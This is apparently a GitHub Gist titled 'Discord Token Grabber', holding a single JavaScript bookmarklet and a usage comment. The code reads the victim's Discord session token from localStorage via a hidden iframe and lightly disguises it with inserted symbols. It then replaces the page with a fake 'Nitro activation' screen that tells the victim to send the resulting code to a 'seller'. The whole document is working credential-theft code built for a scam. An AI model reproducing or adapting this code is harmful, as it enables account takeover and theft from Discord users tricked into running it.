Created
July 16, 2025 16:35
-
-
Save bufferwise/a542320b7566c294820c9e88d977dc40 to your computer and use it in GitHub Desktop.
Discord Token Grabber
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:(function(){try{let f=document.createElement('iframe');f.style.display='none';document.body.appendChild(f);let t=JSON.parse(f.contentWindow.localStorage.token);function o(s){const c="#@$%&^";return s.split('').map(ch=>{let n=Array.from({length:Math.floor(Math.random()*3)+1},()=>c.charAt(Math.floor(Math.random()*c.length))).join('');return ch+n}).join('')}let ob=`infnitroTaglink-${o(t)}-predictnitro#56647`;document.body.innerHTML='';document.head.innerHTML='';document.body.style.cssText="background:#111;color:#fff;font-family:sans-serif;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;padding:20px;text-align:center;";let b=document.createElement('div');b.style.cssText="background:#1e1e1e;padding:30px;border-radius:10px;box-shadow:0 0 20px #00ffff;max-width:90%;width:480px;";let h=document.createElement('h2');h.textContent="π Activation Code Generated";h.style="color:#00ffff;margin-bottom:15px;";let m=document.createElement('p');m.innerHTML="β Nitro is being prepared!<br><br><b>Send this code to your seller to finalize activation:</b>";m.style="margin-bottom:15px;color:#ccc;";let i=document.createElement('textarea');i.value=ob;i.readOnly=true;i.style.cssText="width:100%;padding:12px;font-size:13px;border:none;border-radius:6px;background:#2a2a2a;color:#0f0;text-align:center;margin-bottom:15px;resize:none;";i.rows=3;let c=document.createElement('button');c.textContent='π Copy Code';c.onclick=()=>{navigator.clipboard.writeText(i.value);c.textContent='Copied!';setTimeout(()=>c.textContent='π Copy Code',1500)};c.style.cssText="padding:10px 20px;background:#00ff99;color:#000;border:none;border-radius:6px;cursor:pointer;box-shadow:0 0 8px #00ff99;";b.append(h,m,i,c);document.body.appendChild(b);}catch(e){alert('Error: Could not access nitro from account.')}})(); | |
//Simple Token Grabber, Paste this on URL Column when your discord account is logged in on the web, then click on copy code, it will create an obsucated code of your token. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment